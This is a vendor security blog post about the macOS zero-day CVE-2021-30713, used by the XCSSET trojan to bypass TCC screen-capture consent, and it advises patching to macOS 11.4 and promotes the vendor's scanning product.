MacOS Zero-Day Exploited in Malware Attacks
A MacOS zero-day was used to take unauthorized screenshots of an end user’s active session to harvest sensitive information.
MacOS Vulnerability Used to Target Developers
On Monday, Apple released macOS 11.4 which included a patch for the macOS vulnerability CVE-2021-30713. This CVE was used to take unauthorized screenshots of an end user’s active session to harvest sensitive information.
The exploit was found by researchers at Jamf through the dissection of the XCSSET malware which employs this vulnerability. XCSSET was first caught in the wild between June and July of last year, and functions as a trojan spyware. Trojans are a type of malware which masquerade as authentic software (and generally do provide utility to the victim) but perform a malicious action on the end user’s computer. The XCSSET trojan is a purpose build malware used to exfiltrate data and user information.
How Does the MacOS Exploit Work?
CVE-2021-30713 relies on a previously unknown vulnerability in the MacOS operating system. Apple requires software packages to undergo an approval check by the end user or an administrator prior to initializing.
This process is called Transparency Consent and Control (TCC) protection. As part of the approval process, an alert is sent to the user, communicating the types of permissions which the software wants.
Below is an example of the Security & Privacy panel in MacOS, where various permissions and privacy settings are configured. As shown, each application on the computer has an individual permission setting for screen recording.
In CVE-2021-30713, the Trojan application does not appear in this list. Nor does it prompt the end user or administrator for approval before it captures content from the end user. Instead, it silently activates and begins collecting data to report back to the orchestrators of the attack.
CVE-2021-30713 bypasses the security checks in MacOS by piggybacking the permissions of a currently approved software and masquerading as that application at the time of execution. Specifically, the exploit uses an AppleScript module named “screen_sim.applescript” to capture the list of currently approved screen capturing applications.
Then, the malware creates an additional AppleScript which it injects into the approved application. Using the inherited permissions from the approved application, XCSSET is then able to perform restricted actions on the endpoint. Data which XCSSET collects is then exfiltrated to a command-and-control server hosted by the attackers.
Further analyses by the researchers revealed that the scope of permissions compromised by XCSSET were not limited to just screen capturing, and that XCSSET could also infect browsers to collect sensitive information from online accounts.
The XCSSET Trojan has been found using unverified Xcode plugins as it’s transportation and appears to be targeted at the software development industry. When an unsuspecting programmer installs an infected Xcode plugin with the XCSSET malware imbedded, the malware then deploys itself to the device.
During that deployment, XCSSET uses CVE-2021-30713 to bypass the TCC authorization process and enable its monitoring process. Although XCSSET has only been found in Xcode plugins, because of how XCSSET is architected, any maliciously modified application can be used to deploy XCSSET. Therefore, it is not safe to assume that the malware can only be deployed through Xcode plugins.
At the time of writing, there have been around 400 documented endpoints infected by XCSSET. While this number is small, there are multiple contingent factors which elevate the risk posed by XCSSET. First, the malware has been used to explicitly target developers, which in turn raises questions about the overall safety of the software development supply chain.
Secondly, the 380 reported devices impacted by XCSSET are simply that, the reported devices. The total impact of XCSSET is still totally unknown, and many researchers expect the impact to be significantly larger. At the time of writing, one of the three command-and-control domains used by XCSSET are no longer active. The other two are set to expire later this year.
How to Resolve the Vulnerability
On Monday, Apple released MacOS 11.4. This version of MacOS improves on the current list of supported graphics cards, provides multiple feature updates, and most critically, resolves the CVE-2021-30713 vulnerability, among others. While this update comes 9 – 10 months after the vulnerability was first weaponized, Apple provided limited protection against this vulnerability as early as July 14th, 2020 (The first non-verified positive report of the vulnerability was on June 13th, 2020). Their protection checked against Xcode projects for signatures consistent with the XCSSET malware. With the advent of MacOS 11.4, not only is the XCSSET malware less sticky in the MacOS ecosystem, but its primary method of exploitation is now invalidated.
How Syxsense Can Help
Syxsense Secure provides an expansive vulnerability library which we scan against. All MacOS devices under management with Syxsense Secure are monitored in real time for vulnerabilities just like (and including) CVE-2021-30713. If any critical vulnerability is detected, an automated notification alerts your security operations team of the threat.
Additionally, Syxsense Secure also provides integration with Apple’s update service to deliver critical updates to your Apple devices on a schedule you choose. With Syxsense Cortex (included in Syxsense Secure), vulnerability scanning, alerting, and patching can all be combined into a smart, fully automated workflow.
CVSS Score: 5.5/10
Attack Vector: Local
Attach Complexity: Low
Privileges Required: Low
User Interaction: None
Scope (Jump Point): No